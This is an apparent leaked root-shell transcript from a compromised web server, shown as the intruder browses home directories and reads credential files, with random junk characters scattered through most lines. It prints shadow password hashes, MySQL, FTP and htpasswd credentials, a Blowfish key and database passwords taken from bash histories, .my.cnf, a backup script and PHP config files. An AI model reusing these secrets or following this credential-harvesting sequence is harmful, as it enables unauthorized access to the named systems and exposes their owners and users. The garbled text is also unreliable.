jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::( [7 [. n0 v; |& S
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
' l1 {) D5 C5 W" vastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::6 N: Y0 q2 @% N, f w9 w( w
" p8 T3 y7 r3 P8 @* H8 a4 Ash-3.2# cat /etc/motd7 T$ J' y/ D; F+ ^: O- g6 K. }
#####################################################/ q! b7 S( `! A3 R8 A j
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #+ E G2 L6 c* f1 I6 H
# |__| [__ | |__| | |__| | | | [__ | |__| #
: J4 C( }# `8 y' F+ m# | | ___] | | | |___ | | \/ | ___] | | | #$ T. _ r( e3 `% ^4 ?5 L# R; B6 S
# #7 b5 R. G Z" e2 k# T* q9 X3 ^
#####################################################* \3 u2 M4 k7 ?
# #
/ E$ w) T0 o( {, U# Admin Contact - 链接标记support@secureservertech.com #
6 n8 P8 h: j1 r- W1 m$ M# #7 w3 e. i+ n, F" h# _) v. y
# Available ShortCuts #/ [+ i5 ?! `& \$ _1 X
# #
: n9 i3 v G2 n# nst - list active connections #4 h4 e; I# n/ [0 j( ^3 P
# ddos - shows how many times each ip is connected #
$ }2 }: C! V# v+ t l# ltr - restart the webserver #/ {2 p* |9 E, u) R% W6 q1 \; Q
# phpc - edit the php config file #+ k C8 l; H. V9 p7 J+ A6 b$ T
# htc - edit the webserver configuration file #" w' A/ F# ]4 n0 I( C: r" [3 C) d
# up - uptime #
: y. ?5 l) h1 U3 K* P# etd - edit the motd of the day file #
' v8 m: |$ a. n. c( q! L/ E# htr - start and restart apache if needed #& @2 g& w9 g N( z+ w
# syng - shows active SYN_RECV connections #+ V3 t2 z+ d3 ^; y O1 p+ x- Z
# synd - syn flood blocker - “synd -h” for usage #
8 r: \4 E* p" N#####################################################: }& m* o6 a* p3 V
# NOTES: #
, }' w# T4 |3 D& v8 l. p# Last Upgrade - 12-08-2008 by JF #" C' l- ]4 B1 ^# J
# My.cnf/Mysql Optimization - 1-28-09 #
2 }2 w6 Z8 `5 u- \5 ~. N# #
2 r2 {% N y5 x4 j8 b: W# #
: N9 Z. |) m5 G) p1 _5 [# #
7 y% H! L; Z, k5 n: K3 z1 G' Q+ S#####################################################1 ^7 G" t3 ] R2 b2 j
# F! T4 \" U# y2 U& o
sh-3.2# lastlog | grep -v Never$ d% Z+ D3 `& K. j4 g
Username Port From Latest: s+ i3 ` o# y9 ?8 U
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
0 ?$ v3 _% \' P9 \admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 20089 x! _! H y" o& N
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20090 ^' N. v! |0 x8 R; @ A
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
& f, T$ o6 I3 _4 Q- _5 y8 _; S/ s, [3 [* _. D" T( j
sh-3.2# ls -la1 D$ G# W2 e' g) W6 G9 ?8 E
total 4533761 t3 [: r$ \: S& z8 i; Z2 j7 s
drwxr-x— 15 root root 4096 Jun 4 08:40 .5 z4 F, T4 w: S: `9 h4 `
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..9 C( {9 m7 d ^
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip; R7 u# I6 N+ z, o
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
1 P8 }0 M! O6 {# Y* c* Q: X-rw——- 1 root root 16836 Jun 4 07:21 .bash_history0 m+ X% S g8 H
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout8 L: }8 I; Z, n0 U
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
" x& M- ?- S. f-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc; F& O9 G! w7 m. @
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
, r# I1 F. @( F, }( x+ J% y-rw-r–r– 1 root root 1327 Nov 29 2007 cert& C m. }/ F! k* j1 Z) f
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql7 E, a+ A* m6 f1 f. ^8 Y
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan3 k) b% U6 K* x6 {
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc7 d% A7 ~( Y0 p3 i/ t1 p
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql# v! c' y# {; Y+ K. Z3 S' I
drwx—— 2 root root 4096 Oct 28 2007 .elinks; U6 \2 n% U' P% H# X' f4 G% {
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
" C3 U( T. Z. q8 ?" F" d3 S-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
/ D% V/ V" E, b( y-rw——- 1 root root 0 Apr 16 13:19 .history
, p5 |9 s! C& r& i# j3 V! S p-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
3 L/ s9 K* _) `-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
, L0 W1 ^. R" |: ~, s) f% g-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh! X7 W3 [- ^# N! q* r: F* Y
-rw——- 1 root root 35 Jun 2 14:23 .lesshst
% R. I, b$ z& w( pdrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp9 b4 N# }, {3 _% G! M
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
* g' ^- i1 w. q' O( [-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
, p b) F6 v) Q-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2; k, E; D+ T9 [( R1 q
-rwx—— 1 root root 760 Sep 18 2008 lp
9 f* L6 z$ V J9 {6 j- [/ b7 t' idrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
) Q$ J( ]. m# V-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz# w$ \, w3 `* ]) b. p
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
: I- t% i5 b, s" v) K- @# m! Q1 Udrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
& }# n( ~, m4 c-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
- R0 k+ i" v0 Q7 N% H, C4 Hdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.32 L5 ]$ X$ P5 K' X N; f: s
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz+ ]; Q0 |) O1 J' h$ s* _8 T+ _
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
( u. ]# U; i: q5 J" K; `( J) u-rw——- 1 root root 41 Oct 19 2007 .my.cnf- U- k+ J5 O: m! R, u& \
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history( X% c7 d7 }" o# c
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport, ^3 @" J) f4 i' Q E$ l
-rw——- 1 root root 41 May 20 2008 .mytop- W9 y0 {# z; r
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
0 I( t3 [% _) ]( r+ q' @-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
( e) K5 Q* w+ n+ K" xdrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
& U! h* X8 @+ t* J2 N% n0 C/ D-rw——- 1 root root 1462 Sep 21 2007 opt.php
" [& U% H5 N' h1 h5 o. `6 ^) h-rw-r–r– 1 root root 3371 Sep 22 2007 p. K: h7 w8 g. |- i' w& {
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
, c# v3 Q* X! R3 S3 l- Y& `0 r- x-rw——- 1 root root 1024 Feb 3 21:32 .rnd$ f( R2 c% |+ a+ \
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
8 P7 N' P$ }1 z& k. i" A) V! E-rw-r–r– 1 root root 887 Nov 28 2007 server.key
5 m& s- m: D' A1 c& i% i) zdrwx—— 2 root root 4096 Oct 10 2008 .ssh
* I6 n5 V. D8 C. j) |8 D-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
# \+ C* m. }, B-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc8 e9 ^* U" [8 I* E+ \7 M4 m
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
4 s, O; v7 F, I8 b# c-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.10 O( }( X8 I. m% ?+ n) H3 n
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp2 A" f5 K2 }. h2 V
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh6 u8 T8 ]3 N% E" G" h
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0+ X# n* t( ]1 K" D
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2. @( {: D: c- G: V- ~/ M0 l
-rw——- 1 root root 12997 May 16 2008 .viminfo6 b. |7 k! p4 ]/ o% P* V* I
2 C0 F* H9 K, z V$ j! z1 Y
sh-3.2# cat .bash_history
, S9 x* [$ z2 I$ ~9 w$ C. t- D% Z[snip]
- R3 G# Z& }) f4 j/ U+ Jwget cp4sst.com/sstlinux.tar.gz
" j4 B4 n P( Dtar zxvf sstlinux.tar.gz& n- u3 K e1 \7 m
cd linux-2.6.27.10
) k7 A4 E, w& m4 {+ l9 msh install.sh
, Y& t3 m0 p$ w1 v u! Smake bzImage ; make modules ; make modules_install ; make install
" d" N. M2 x$ R$ Vmake clean; R# k4 U5 w/ b: z$ Y
service mysqld restart y8 A4 E- {! v, u1 w0 F) l
[snip]
6 _! P7 j* F1 ocd /usr/sbin/6 A( ?% q8 R/ `% t
chmod 4777 traceroute$ z5 }, f; k2 u% Y- K- |
chmod 4777 ping
m/ ^# e: Z. k# ?5 Dtraceroute -I 链接标记[url]www.astalavista.ch[/url]
* k# N8 d y# ~+ f/ _) D$ m6 k[snip]
2 i, r S: o o: g6 C* A# Q6 o5 h2 Evi /etc/csf/csf.conf8 k/ J0 F. u0 L9 [8 ` z
traceroute google.ch: b' l6 W6 S+ {0 T* i9 N* @/ @% V
service csf restart- A. C7 R n. U; F) v7 G
tracert google.ch
2 p# Y$ E8 s2 Rservice csf restart
4 H% t: z4 v5 straceroute 链接标记[url]www.google.ch[/url]
4 q9 `0 ~8 g# Z+ Qtracert 链接标记[url]www.google.ch[/url]
* q) b$ l W" otraceroute 链接标记[url]www.google.ch[/url]6 V2 A+ o7 g+ Z
locate traceroute
8 k) b5 h' _. T0 t, }& @/ v, Echown 4755 /bin/traceroute' N3 k8 X: c3 `
chown 4777 /bin/traceroute
5 d7 V6 e! \; p/ G% U/ glocate ping
( V5 G- D- F% M# ichown 4755 /bin/ping
; n2 q7 r/ G( @# o* Y* pchown 4777 /bin/ping$ W' [) f g: R9 G; {( N% x+ b
cd /bin/8 H X% Y. b- m3 _% i7 r6 c0 D
ls -ali | grep ping, K- n# I2 c3 o% _) n% z
chown root ping0 g! Q4 F6 G/ S* x+ C
chmod 4755 ping$ J" T) G$ H! G- T
ls -ali | grep traceroute1 |$ H2 {+ A5 ~0 f, F6 Z* @1 K1 o* \, H
chown root traceroute
: _1 d) f8 ^* q* i( B Qchmod 4755 traceroute$ Q6 L s1 t8 b4 {; _
ls -ali | grep traceroute
! ~# y! }/ p5 z9 b* B; Xtraceroute -I 链接标记[url]www.google.ch[/url]
7 z' e1 n4 z6 y( @traceroute 链接标记[url]www.google.ch[/url]
" L5 E3 ~/ k p' }7 u, Uwhois pmsantos.ch
7 f& B2 Q+ U8 u& W' Y" p( Y1 y[snip]
& \' `2 E6 H7 ^' a5 T5 w, }7 {mysql -h com_contrexx2_live < /root/defaultp_ports.sql' `$ l* S, c6 d8 I/ p, ~* \ [) f! }6 a
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql/ ? I) z! z% y2 b% ~' o
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql2 a+ {2 s V' Z
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql5 j# a* k" K6 E8 S7 V* d z
top
0 X3 B3 Q" ?$ }6 H Nping ssth.ch7 a; h, d5 x0 [. F9 S5 L8 Z! e7 W
ping asdlkfaljgasd???ljg???lasj.ch
6 J: ]/ Q+ C: x' Qping asdlkfaljgasdlasj.ch
6 i! `4 E, W; I3 _. a" Y5 N) dping 链接标记[url]www.ssth.ch[/url]( `% O. H! R5 `
ping ssth.ch. Y v5 ]- V* N- V9 T' E+ G
nslookup 链接标记[url]www.google.ch[/url]
. K3 Z4 \9 ^; B% y/ Rnslookup 链接标记[url]www.ssth.ch[/url]
, p9 B0 B# V7 O `. I+ B6 Yman nslookup
% Y' b: `2 z; G5 Uping 链接标记[url]www.google.ch[/url]/ \' Y. b; `; u& [5 A$ j
nslookup 链接标记[url]www.google.ch[/url]/ d1 i) u& C! h8 p; P) w" b# d2 S
nslookup 链接标记[url]www.google.ch[/url]
6 D/ d8 I/ }0 O& `! T0 Mnslookup salfjasdlf.ch
6 P9 y$ U6 C3 Q- R2 T. b[snip]+ |2 _) ]8 e% A0 Y @
openssl passwd -1 sadf
8 m1 i. `% Z! ]( _; `4 xopenssl passwd -1 5cZNHstdTy9 {! n4 W( {2 l2 A
mysql
# {" B7 o3 N nmysql
$ H6 l6 d- u E0 D) m/ glocate proftp( H$ H" f$ `) r. S p$ X! z2 Q
vi /etc/proftpd.passwd
- M/ E) b8 R" _; h2 u; @4 I* Kservice proftpd restart: M# c1 a7 |. Y/ b7 d) B
locate proftpd.conf4 Y' b6 P# ]* g# X# U1 F) I7 e7 q
vi /etc/proftpd.conf
) h) p7 x. E* [; }( y3 [7 {vi /etc/proftpd.passwd
5 ~, D+ r. v- ~+ M4 P. p: f6 v9 Z& Gservice proftpd restart
: ?8 p: v( Z: {# G[snip] ~ D- K) a% f7 B8 I. w+ Q
/bin/sh /home/com/backup_system/backup.sh
/ Q* }& j! ?9 C1 i1 A [0 L) w) ]tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin1 H7 I m% U6 V" L; G3 `$ f& o
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql; X8 y! H0 |6 \' t0 W4 ?, }
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql4 }" } t7 l+ T/ s" \/ X1 A
ls -ali
# c2 |* g' X8 `$ H# `( \3 ~5 @mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql; I! B" w6 ?7 H' y
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
* P! |, P/ I, Q# ]crontab -l, S+ D2 c E" H& h% m% o/ ]
crontab -l% Y* G J& k4 W% H
php -q /home/com/public_html/modifications/cronjobs/securitynews.php# @9 ^# \- p2 ~# s4 U
/home/com/public_html/modifications/cronjobs/exploits.sh. ?8 j( C! Y3 u3 m' i+ ^ p
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]9 Y2 A( Q' p* h4 Z
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz" l) Y! R0 g) q9 Z. ^1 ]
cd lsws-4.0.3
7 y0 c+ F0 G `4 a: W' ^( Rsh install.sh4 R& {* R) l8 t
uptime8 T0 z' K8 Z2 K2 F7 S& G- F0 j
hdparm -tt /dev/sda9 |, W0 D4 a( H% \( w0 t: k
iostat9 P: V8 C! C5 v/ R. s; g
yum install iostat# y8 U" {2 N$ x" s- Y
iostat# I7 H" |- Q& t% ~7 h" |
whereis iostat; k0 c) i% q# v& y! u4 C
yjm clean all" l" R8 g/ p9 A/ d4 T
yum clean all ; yum -y update& m7 W4 l& @( w1 H9 `! g
iostat, N: o; _: c3 h; K2 g. t9 t+ f+ W1 _
yum install systat/ G/ r1 k! v" c" m+ k
rpm -qa | grep iostat. f; [+ ^; o2 G% p; o3 @
rpm -qa | grep sysstat* ]! V* X5 y+ j" h
rpm -qa | grep systat
/ {/ l5 S" ?5 S5 u2 @8 T0 ?dmesg -c
( w k3 Y* x( v. ~sysctl -p
, \. p% Y8 _; B% Suname -r/ @5 t" |0 r" b2 d% h- X4 z; _7 Q
cd /usr/src5 v- N& R1 d' c/ h* ?/ w
wget nix101.com/kernels/sstlinux.tar.gz: M4 g, y9 P+ s% R6 A
shutdown -r now
& k3 z) P; d8 {9 V4 nnano -w /boot/grub/grub.conf) _1 Y" E* x" a" m: {* V' v
2 g/ X1 }1 v- q$ Qsh-3.2# cat .my.cnf2 A; s) N4 y& s1 z: U
[client]1 l) @% S2 e) K [& c
user=da_admin
# v4 C$ i, `- X5 H; ~password=X9dctmRH
! P2 _$ F( A% E6 o) j
3 ]/ o2 v# s# m) } \3 R5 Ash-3.2# cat /home/com/backup_system/backup.sh
3 M$ x. [+ ^& D1 d" J! C#!/bin/sh0 ~! d$ Q! q* a. ^+ g& z
#####################################################################8 S. b, P6 j8 U; X
# #
5 b2 {7 d% _* }+ w3 G' V, \& Q# incremental backup for astalavista.com #
; I9 d& h7 r, }; Y# #- C4 C+ c- A. `, o/ O9 ]. k/ V
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #* R# Q1 J5 Q" y( j: C
# #' u _" ]4 \+ \7 ?7 L
#####################################################################$ ~/ U6 j+ @% x" l+ d
[snip]
' r, V8 g9 l7 ]# {0 yPROG_DIR=”/home/com/backup_system”;, e) a9 j5 ~4 }$ u; P
BACKUP_DIR=”/home/com/backups”;& R# i5 A6 L9 U) x) F
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
; W- o: `4 S% @3 a6 ]+ N# ftp for synology backup server/ K/ {0 c7 m/ N4 A' I
FTP_HOST=”212.254.194.163″;' R" E5 ?2 P* ?/ V9 y' M
FTP_PORT=”21″;
! O/ ]* T+ J( u) ~! |1 [FTP_USER=”astalavista.com”;! P6 P+ ?4 t, ]' F5 \. ]
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;4 {/ D6 R/ T$ c8 b* o2 d5 r+ M! C! h
FTP_DIR=”/astalavista.com”;
. E" P' F- V% ?* b c# database% s3 C h) u$ D7 A0 d2 ]8 k+ d
DB_HOST=”localhost”;% J9 ?/ ]4 k: m4 Q* A
DB_USER=”contrexxuser2″;& ?6 C9 t/ P8 i! Y. I
DB_PASS=”0fEYNZgXz1pKe”;! @# y* ?7 F6 h
DB_DATABASE1=”com_contrexx2_live”;
( M6 O$ _, A' KDB_DATABASE2=”com_contrexx2″;
6 S1 H9 A3 j* U- ~1 s3 w6 Q2 C" v) H[snip]) {' H, `% b* h& x7 y0 n6 W1 @; E
ftp -in $FTP_HOST $FTP_PORT <<EOF4 Y0 j* W, W6 D1 t9 ?
quote USER $FTP_USER7 p% b) @; A' T6 D4 I( \+ ?. j
quote PASS $FTP_PASS8 U$ r* J( s2 n. [' A: _
cd $FTP_DIR; l) F5 d2 m$ C4 D# R" R
put $DB_FULLNAME-SQL_Dump.tar% ~5 i' }% r8 B- p& T' l! h
put $BACKUP_FULLNAME-Public_HTML.tar
) c& J! E7 U! i! m; Xclose* Q1 ^; y$ j/ x! v
bye
$ m8 p6 Y3 m. xEOF
" x' O/ L ]" ~* P- z4 \* C3 v" X8 |1 I9 |2 V
sh-3.2# cd /home
' P! Y1 R' ]# u7 U% J! ^sh-3.2# ls -la5 \/ B ~" w! Z: E; U: |$ }( I8 R+ Z
total 1200 x8 M! }/ a* T* s, W6 |0 t
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .5 x& ]" y) p ?! \- f- E2 J
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..) b6 ~4 n3 T, t1 T
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
H, J/ U4 W& Q, c L' X-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
( I7 N- ]+ |" v% X \) u-rw——- 1 root root 8192 Jun 3 02:45 aquota.user- k& n# u- x4 K# W" E7 L" Q" r
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
" C7 T- ^8 x% N4 adrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
, B3 M7 d7 S! ldrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141613 w3 t2 {, I6 F* S l# l
drwx–x–x 10 com com 4096 Apr 28 12:40 com! w5 A( d8 n# y
drwxr-xr-x 2 root root 4096 May 17 2007 ftp" N. W* B# z# A( H: M! E
drwx—— 3 jon jon 4096 Sep 21 2007 jon
5 ^! B2 n0 t Y7 ^0 rdrwx—— 2 root root 16384 Sep 11 2007 lost+found
q7 Q3 w) m6 mdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
+ i$ j! `' K/ S% o. adrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
( k2 E# D/ s' H/ R6 Ydrwx—— 2 jon jon 4096 Sep 15 2007 test5 _7 j9 f# z" j7 w; o2 m$ Q
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp& F) W h3 ?" Q1 v' ?: n
6 [* Y0 T* u4 X$ ash-3.2# cd admin
. I+ |0 ~! E1 w# Ush-3.2# ls -la) G, R, j' ]! p% V
total 1735896
' {. s" s9 d+ }2 }drwx–x–x 9 admin admin 4096 Nov 28 2007 .8 R! w6 A; Y0 \1 T7 s
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..6 Q+ v4 U5 i3 h0 E% T" P
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups, F l. O+ v9 ~( Q; c3 z
drwx—— 2 admin admin 4096 Sep 28 2007 backups- [# s; L! Y. R3 A
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
8 o' r, m% B1 K6 i9 s-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout3 O6 s. A1 X; D n! d- p; L t
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile# w) @" ^) x$ X/ m- Q2 F
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
. t# H1 O3 D# S/ g3 o2 u6 Sdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups+ G% c2 ^( g! q9 [; a b0 M
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains! i8 d% n; h/ D; [: \
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
9 N/ C5 Z% A. G. W: Y, e' Q-rw-r–r– 1 root root 24 Sep 21 2007 info.php9 V( I. x3 J c' h2 U* ^
drwx—— 2 admin admin 4096 Sep 21 2007 mail) W) S5 i$ B5 p5 R8 F
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
: h4 G' S3 E7 J6 R' \" p-rw-r–r– 1 root root 887 Nov 28 2007 server.key" I; S$ E+ y. L1 Y/ Q0 |
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow7 |8 s8 X: d" ]3 _* M
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
! d1 C. F9 H" W, o. bdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups# a$ e$ @" ~" q. c- }& y
2 b2 }* z$ _4 { Fsh-3.2# ..
/ H0 o2 M: x' K& L2 R: u5 n6 Hsh-3.2# cd jon
: @' D* z& J% q7 r0 [/ N msh-3.2# ls -la8 T6 X) r) j( D- K$ \2 Y) ~* o
total 36
: v* C7 k' d1 D+ C2 U' ndrwx—— 3 jon jon 4096 Sep 21 2007 .
6 r6 E/ b+ E9 f8 o) Mdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..8 s. A2 w6 u$ Z# t/ _6 ^
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
, A: g; i# k+ G$ _3 q6 f! u-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout& D% B5 }$ r3 Q8 z1 @9 k" V
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile& C% ?4 F% q1 ~; c- h# o
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
% ]) u1 w+ n) ]) K5 o9 l4 B-rw-r–r– 1 root root 24 Sep 21 2007 info.php
$ u4 d o) B$ i. Xdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html8 A1 H9 d7 O$ W+ M5 i6 O6 U7 E
6 y% S6 f+ S6 Y! X1 L6 Z
sh-3.2# cd ..& {& {7 s1 B _) E' ]
sh-3.2# cd test
6 c$ j: N* i) L" K( A# ?sh-3.2# ls -la. t& H! h) i- R1 ~
total 48
+ M' m* C& _0 i: Idrwx—— 2 jon jon 4096 Sep 15 2007 .
* ~* N" m$ r! p8 G& k6 Vdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
& k! k; O/ d; C. P% O* K-rw——- 1 jon jon 79 Sep 21 2007 .bash_history* a- _; f* O$ `/ N* ?$ T
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
M# G3 ?5 {1 R3 ^* x! j-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
3 r& C: f( k# o/ D6 L-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
% R5 N7 R+ \( @; C$ n- @5 V, R' F. r5 @sh-3.2# cat .bash_history
& i7 f' X7 E, y! z/usr/bin/mysqladmin -u root password PoliuJhytg67
9 H; e" f/ ?4 I: B" g
4 k) | Z" E7 _+ zsh-3.2# cd ..
6 Q5 f \2 i2 A8 J1 C! q7 z8 u# B! |( ysh-3.2# cd astanet+ I' U7 _4 p% d; G2 n
sh-3.2# ls -la
4 U: p! [+ o% ?' t9 H _total 52. F: }. s* U4 y5 H6 C+ o
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .( L2 l0 C' b6 q( f
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..& b; b! S* ?2 m7 J' N1 ?
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth }' g! ^6 P" L& L1 ~3 h
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history; {3 M7 f8 `: s
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout) Q- \- V7 h# A7 i: R
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
$ \ o3 m( X$ z( t# D* z# y* L( }7 b" |-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc1 r2 ?0 Q! A9 Q% ?0 b1 \ N
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
7 d& v3 b7 z8 Q5 C6 E, Jdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
4 w+ B7 d0 o7 W' r1 ?" edrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
S5 a, `2 V! ^( b* {6 @-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history: ?# }3 M+ [& ]- ]. @6 ^
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html$ n: R+ @; L# @! G
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow5 q& A3 Y' M# p. V8 \/ u
. S, M# T- d+ j2 E8 O, b* y& A4 h- [
sh-3.2# cd auth/5 C3 ^( B" O- r/ Z" w
sh-3.2# ls -la) P: s5 M% K: ^( ], C
total 28/ x- l1 t4 t" w, V+ A7 o2 H% P
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
$ ]/ e4 d$ @. {$ ?. d1 R+ q# E0 Ydrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
% R8 n. h5 P4 i9 n: d-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
& F- R$ l' N" m7 [" h! a-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php/ b& A) ^( W0 @+ d" i
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd! O& v5 b7 K% Z
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
/ Q1 D" z( ?8 M) M% c( t' s-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd4 L. }5 ]8 q5 o7 b6 l, e6 }
8 U$ r" a% J; w6 e/ e2 Y; ?4 Lsh-3.2# cat hackercontest.config.inc.php/ |) c( j2 z% d3 @
<?PHP
1 Q9 f* a0 s, b* N. G// Variabeln f?r Verbindung zur Datenbank //
# L5 v2 V3 t& X' @" n- ]$conxHost = ‘localhost’; // MySQL hostname2 N% q/ n+ V1 Q* b H, k: D
$conxUser = ‘hackercontest’; // MySQL user' p1 i$ O G& l5 T$ B1 t! v
$conxPassword = ‘K6m@7dUc’; // MySQL password
B! b/ f1 b! d8 l/ b" R$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish' N$ X a, ?7 Z4 `5 K' l2 c
?>
4 V/ V- ?/ J0 m5 y$ Gsh-3.2# cat hosting.config.inc.php
1 B7 O8 z" K% Z& H<?PHP
9 O; b6 o1 ^. |// Variabeln f?r Verbindung zur Datenbank //- W" t$ \' J' E; B6 y, q* r
$conxHost = ‘localhost’; // MySQL hostname! ]; A; d6 @; E* s6 T
$conxUser = ‘hostinguser’; // MySQL user
# F' R/ x) L+ D% k7 ^( ]$conxPassword = ‘cXvB3981′; // MySQL password
